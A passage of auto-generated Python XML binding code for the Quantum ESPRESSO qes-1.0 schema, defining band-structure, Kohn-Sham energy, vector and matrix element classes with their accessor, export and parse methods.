def __init__(self, lsda=None, noncolin=None, spinorbit=None, nbnd=None, nbnd_up=None, nbnd_dw=None, nelec=None, num_of_atomic_wfc=None, wf_collected=None, fermi_energy=None, highestOccupiedLevel=None, two_fermi_energies=None, starting_k_points=None, nks=None, occupations_kind=None, smearing=None, ks_energies=None):
self.original_tagname_ = None
self.lsda = lsda
self.noncolin = noncolin
self.spinorbit = spinorbit
self.nbnd = nbnd
self.nbnd_up = nbnd_up
self.nbnd_dw = nbnd_dw
self.nelec = nelec
self.num_of_atomic_wfc = num_of_atomic_wfc
self.wf_collected = wf_collected
self.fermi_energy = fermi_energy
self.highestOccupiedLevel = highestOccupiedLevel
self.two_fermi_energies = two_fermi_energies
self.validate_d2vectorType(self.two_fermi_energies)
self.starting_k_points = starting_k_points
self.nks = nks
self.occupations_kind = occupations_kind
self.smearing = smearing
if ks_energies is None:
self.ks_energies = []
else:
self.ks_energies = ks_energies
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, band_structureType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if band_structureType.subclass:
return band_structureType.subclass(*args_, **kwargs_)
else:
return band_structureType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_lsda(self): return self.lsda
def set_lsda(self, lsda): self.lsda = lsda
def get_noncolin(self): return self.noncolin
def set_noncolin(self, noncolin): self.noncolin = noncolin
def get_spinorbit(self): return self.spinorbit
def set_spinorbit(self, spinorbit): self.spinorbit = spinorbit
def get_nbnd(self): return self.nbnd
def set_nbnd(self, nbnd): self.nbnd = nbnd
def get_nbnd_up(self): return self.nbnd_up
def set_nbnd_up(self, nbnd_up): self.nbnd_up = nbnd_up
def get_nbnd_dw(self): return self.nbnd_dw
def set_nbnd_dw(self, nbnd_dw): self.nbnd_dw = nbnd_dw
def get_nelec(self): return self.nelec
def set_nelec(self, nelec): self.nelec = nelec
def get_num_of_atomic_wfc(self): return self.num_of_atomic_wfc
def set_num_of_atomic_wfc(self, num_of_atomic_wfc): self.num_of_atomic_wfc = num_of_atomic_wfc
def get_wf_collected(self): return self.wf_collected
def set_wf_collected(self, wf_collected): self.wf_collected = wf_collected
def get_fermi_energy(self): return self.fermi_energy
def set_fermi_energy(self, fermi_energy): self.fermi_energy = fermi_energy
def get_highestOccupiedLevel(self): return self.highestOccupiedLevel
def set_highestOccupiedLevel(self, highestOccupiedLevel): self.highestOccupiedLevel = highestOccupiedLevel
def get_two_fermi_energies(self): return self.two_fermi_energies
def set_two_fermi_energies(self, two_fermi_energies): self.two_fermi_energies = two_fermi_energies
def get_starting_k_points(self): return self.starting_k_points
def set_starting_k_points(self, starting_k_points): self.starting_k_points = starting_k_points
def get_nks(self): return self.nks
def set_nks(self, nks): self.nks = nks
def get_occupations_kind(self): return self.occupations_kind
def set_occupations_kind(self, occupations_kind): self.occupations_kind = occupations_kind
def get_smearing(self): return self.smearing
def set_smearing(self, smearing): self.smearing = smearing
def get_ks_energies(self): return self.ks_energies
def set_ks_energies(self, ks_energies): self.ks_energies = ks_energies
def add_ks_energies(self, value): self.ks_energies.append(value)
def insert_ks_energies_at(self, index, value): self.ks_energies.insert(index, value)
def replace_ks_energies_at(self, index, value): self.ks_energies[index] = value
def validate_d2vectorType(self, value):
# Validate type d2vectorType, a restriction on double.
if value is not None and Validate_simpletypes_:
if len(str(value)) != 2:
warnings_.warn('Value "%(value)s" does not match xsd length restriction on d2vectorType' % {"value" : value} )
def hasContent_(self):
if (
self.lsda is not None or
self.noncolin is not None or
self.spinorbit is not None or
self.nbnd is not None or
self.nbnd_up is not None or
self.nbnd_dw is not None or
self.nelec is not None or
self.num_of_atomic_wfc is not None or
self.wf_collected is not None or
self.fermi_energy is not None or
self.highestOccupiedLevel is not None or
self.two_fermi_energies is not None or
self.starting_k_points is not None or
self.nks is not None or
self.occupations_kind is not None or
self.smearing is not None or
self.ks_energies
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='band_structureType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('band_structureType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='band_structureType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='band_structureType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='band_structureType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='band_structureType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.lsda is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:lsda>%s</qes:lsda>%s' % (self.gds_format_boolean(self.lsda, input_name='lsda'), eol_))
if self.noncolin is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:noncolin>%s</qes:noncolin>%s' % (self.gds_format_boolean(self.noncolin, input_name='noncolin'), eol_))
if self.spinorbit is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:spinorbit>%s</qes:spinorbit>%s' % (self.gds_format_boolean(self.spinorbit, input_name='spinorbit'), eol_))
if self.nbnd is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nbnd>%s</qes:nbnd>%s' % (self.gds_format_integer(self.nbnd, input_name='nbnd'), eol_))
if self.nbnd_up is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nbnd_up>%s</qes:nbnd_up>%s' % (self.gds_format_integer(self.nbnd_up, input_name='nbnd_up'), eol_))
if self.nbnd_dw is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nbnd_dw>%s</qes:nbnd_dw>%s' % (self.gds_format_integer(self.nbnd_dw, input_name='nbnd_dw'), eol_))
if self.nelec is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nelec>%s</qes:nelec>%s' % (self.gds_format_double(self.nelec, input_name='nelec'), eol_))
if self.num_of_atomic_wfc is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:num_of_atomic_wfc>%s</qes:num_of_atomic_wfc>%s' % (self.gds_format_integer(self.num_of_atomic_wfc, input_name='num_of_atomic_wfc'), eol_))
if self.wf_collected is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:wf_collected>%s</qes:wf_collected>%s' % (self.gds_format_boolean(self.wf_collected, input_name='wf_collected'), eol_))
if self.fermi_energy is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:fermi_energy>%s</qes:fermi_energy>%s' % (self.gds_format_double(self.fermi_energy, input_name='fermi_energy'), eol_))
if self.highestOccupiedLevel is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:highestOccupiedLevel>%s</qes:highestOccupiedLevel>%s' % (self.gds_format_double(self.highestOccupiedLevel, input_name='highestOccupiedLevel'), eol_))
if self.two_fermi_energies is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:two_fermi_energies>%s</qes:two_fermi_energies>%s' % (self.gds_format_double_list(self.two_fermi_energies, input_name='two_fermi_energies'), eol_))
if self.starting_k_points is not None:
self.starting_k_points.export(outfile, level, namespaceprefix_, name_='starting_k_points', pretty_print=pretty_print)
if self.nks is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nks>%s</qes:nks>%s' % (self.gds_format_integer(self.nks, input_name='nks'), eol_))
if self.occupations_kind is not None:
self.occupations_kind.export(outfile, level, namespaceprefix_, name_='occupations_kind', pretty_print=pretty_print)
if self.smearing is not None:
self.smearing.export(outfile, level, namespaceprefix_, name_='smearing', pretty_print=pretty_print)
for ks_energies_ in self.ks_energies:
ks_energies_.export(outfile, level, namespaceprefix_, name_='ks_energies', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'lsda':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'lsda')
self.lsda = ival_
elif nodeName_ == 'noncolin':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'noncolin')
self.noncolin = ival_
elif nodeName_ == 'spinorbit':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'spinorbit')
self.spinorbit = ival_
elif nodeName_ == 'nbnd' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'nbnd')
self.nbnd = ival_
elif nodeName_ == 'nbnd_up' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ < 0:
raise_parse_error(child_, 'requires nonNegativeInteger')
ival_ = self.gds_validate_integer(ival_, node, 'nbnd_up')
self.nbnd_up = ival_
elif nodeName_ == 'nbnd_dw' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ < 0:
raise_parse_error(child_, 'requires nonNegativeInteger')
ival_ = self.gds_validate_integer(ival_, node, 'nbnd_dw')
self.nbnd_dw = ival_
elif nodeName_ == 'nelec' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'nelec')
self.nelec = fval_
elif nodeName_ == 'num_of_atomic_wfc' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'num_of_atomic_wfc')
self.num_of_atomic_wfc = ival_
elif nodeName_ == 'wf_collected':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'wf_collected')
self.wf_collected = ival_
elif nodeName_ == 'fermi_energy' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'fermi_energy')
self.fermi_energy = fval_
elif nodeName_ == 'highestOccupiedLevel' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'highestOccupiedLevel')
self.highestOccupiedLevel = fval_
elif nodeName_ == 'two_fermi_energies':
two_fermi_energies_ = child_.text
two_fermi_energies_ = self.gds_validate_double_list(two_fermi_energies_, node, 'two_fermi_energies')
self.two_fermi_energies = two_fermi_energies_
# validate type d2vectorType
self.validate_d2vectorType(self.two_fermi_energies)
elif nodeName_ == 'starting_k_points':
obj_ = k_points_IBZType.factory()
obj_.build(child_)
self.starting_k_points = obj_
obj_.original_tagname_ = 'starting_k_points'
elif nodeName_ == 'nks' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'nks')
self.nks = ival_
elif nodeName_ == 'occupations_kind':
obj_ = occupationsType.factory()
obj_.build(child_)
self.occupations_kind = obj_
obj_.original_tagname_ = 'occupations_kind'
elif nodeName_ == 'smearing':
obj_ = smearingType.factory()
obj_.build(child_)
self.smearing = obj_
obj_.original_tagname_ = 'smearing'
elif nodeName_ == 'ks_energies':
obj_ = ks_energiesType.factory()
obj_.build(child_)
self.ks_energies.append(obj_)
obj_.original_tagname_ = 'ks_energies'
# end class band_structureType
class ks_energiesType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, k_point=None, npw=None, eigenvalues=None, occupations=None):
self.original_tagname_ = None
self.k_point = k_point
self.npw = npw
self.eigenvalues = eigenvalues
self.occupations = occupations
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ks_energiesType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ks_energiesType.subclass:
return ks_energiesType.subclass(*args_, **kwargs_)
else:
return ks_energiesType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_k_point(self): return self.k_point
def set_k_point(self, k_point): self.k_point = k_point
def get_npw(self): return self.npw
def set_npw(self, npw): self.npw = npw
def get_eigenvalues(self): return self.eigenvalues
def set_eigenvalues(self, eigenvalues): self.eigenvalues = eigenvalues
def get_occupations(self): return self.occupations
def set_occupations(self, occupations): self.occupations = occupations
def hasContent_(self):
if (
self.k_point is not None or
self.npw is not None or
self.eigenvalues is not None or
self.occupations is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='ks_energiesType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ks_energiesType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ks_energiesType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='ks_energiesType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='ks_energiesType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='ks_energiesType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.k_point is not None:
self.k_point.export(outfile, level, namespaceprefix_, name_='k_point', pretty_print=pretty_print)
if self.npw is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:npw>%s</qes:npw>%s' % (self.gds_format_integer(self.npw, input_name='npw'), eol_))
if self.eigenvalues is not None:
self.eigenvalues.export(outfile, level, namespaceprefix_, name_='eigenvalues', pretty_print=pretty_print)
if self.occupations is not None:
self.occupations.export(outfile, level, namespaceprefix_, name_='occupations', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'k_point':
obj_ = k_pointType.factory()
obj_.build(child_)
self.k_point = obj_
obj_.original_tagname_ = 'k_point'
elif nodeName_ == 'npw' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'npw')
self.npw = ival_
elif nodeName_ == 'eigenvalues':
class_obj_ = self.get_class_obj_(child_, vectorType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.eigenvalues = obj_
obj_.original_tagname_ = 'eigenvalues'
elif nodeName_ == 'occupations':
class_obj_ = self.get_class_obj_(child_, vectorType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.occupations = obj_
obj_.original_tagname_ = 'occupations'
# end class ks_energiesType
class closedType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, DATE=None, TIME=None, valueOf_=None):
self.original_tagname_ = None
self.DATE = _cast(None, DATE)
self.TIME = _cast(None, TIME)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, closedType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if closedType.subclass:
return closedType.subclass(*args_, **kwargs_)
else:
return closedType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_DATE(self): return self.DATE
def set_DATE(self, DATE): self.DATE = DATE
def get_TIME(self): return self.TIME
def set_TIME(self, TIME): self.TIME = TIME
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='closedType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('closedType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='closedType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='closedType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='closedType'):
if self.DATE is not None and 'DATE' not in already_processed:
already_processed.add('DATE')
outfile.write(' DATE=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.DATE), input_name='DATE')), ))
if self.TIME is not None and 'TIME' not in already_processed:
already_processed.add('TIME')
outfile.write(' TIME=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.TIME), input_name='TIME')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='closedType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('DATE', node)
if value is not None and 'DATE' not in already_processed:
already_processed.add('DATE')
self.DATE = value
value = find_attr_value_('TIME', node)
if value is not None and 'TIME' not in already_processed:
already_processed.add('TIME')
self.TIME = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class closedType
class vectorType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, size=None, valueOf_=None, extensiontype_=None):
self.original_tagname_ = None
self.size = _cast(int, size)
self.valueOf_ = valueOf_
self.extensiontype_ = extensiontype_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, vectorType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if vectorType.subclass:
return vectorType.subclass(*args_, **kwargs_)
else:
return vectorType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_size(self): return self.size
def set_size(self, size): self.size = size
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def get_extensiontype_(self): return self.extensiontype_
def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='vectorType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('vectorType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='vectorType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='vectorType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='vectorType'):
if self.size is not None and 'size' not in already_processed:
already_processed.add('size')
outfile.write(' size="%s"' % self.gds_format_integer(self.size, input_name='size'))
if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
outfile.write(' xsi:type="%s"' % self.extensiontype_)
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='vectorType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('size', node)
if value is not None and 'size' not in already_processed:
already_processed.add('size')
try:
self.size = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
value = find_attr_value_('xsi:type', node)
if value is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
self.extensiontype_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class vectorType
class integerVectorType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, size=None, valueOf_=None, extensiontype_=None):
self.original_tagname_ = None
self.size = _cast(int, size)
self.valueOf_ = valueOf_
self.extensiontype_ = extensiontype_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, integerVectorType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if integerVectorType.subclass:
return integerVectorType.subclass(*args_, **kwargs_)
else:
return integerVectorType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_size(self): return self.size
def set_size(self, size): self.size = size
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def get_extensiontype_(self): return self.extensiontype_
def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='integerVectorType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('integerVectorType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='integerVectorType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='integerVectorType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='integerVectorType'):
if self.size is not None and 'size' not in already_processed:
already_processed.add('size')
outfile.write(' size="%s"' % self.gds_format_integer(self.size, input_name='size'))
if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
outfile.write(' xsi:type="%s"' % self.extensiontype_)
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='integerVectorType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('size', node)
if value is not None and 'size' not in already_processed:
already_processed.add('size')
try:
self.size = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
value = find_attr_value_('xsi:type', node)
if value is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
self.extensiontype_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class integerVectorType
class matrixType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, rank=None, dims=None, order=None, valueOf_=None, extensiontype_=None):
self.original_tagname_ = None
self.rank = _cast(int, rank)
self.dims = _cast(int, dims)
self.order = _cast(None, order)
self.valueOf_ = valueOf_
self.extensiontype_ = extensiontype_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, matrixType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if matrixType.subclass:
return matrixType.subclass(*args_, **kwargs_)
else:
return matrixType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_rank(self): return self.rank
def set_rank(self, rank): self.rank = rank
def get_dims(self): return self.dims
def set_dims(self, dims): self.dims = dims
def get_order(self): return self.order
def set_order(self, order): self.order = order
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def get_extensiontype_(self): return self.extensiontype_
def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='matrixType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('matrixType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='matrixType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='matrixType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='matrixType'):
if self.rank is not None and 'rank' not in already_processed:
already_processed.add('rank')
outfile.write(' rank="%s"' % self.gds_format_integer(self.rank, input_name='rank'))
if self.dims is not None and 'dims' not in already_processed:
already_processed.add('dims')
outfile.write(' dims=%s' % (quote_attrib(self.dims), ))
if self.order is not None and 'order' not in already_processed:
already_processed.add('order')
outfile.write(' order=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.order), input_name='order')), ))
if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
outfile.write(' xsi:type="%s"' % self.extensiontype_)
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='matrixType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('rank', node)
if value is not None and 'rank' not in already_processed:
already_processed.add('rank')
try:
self.rank = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.rank <= 0:
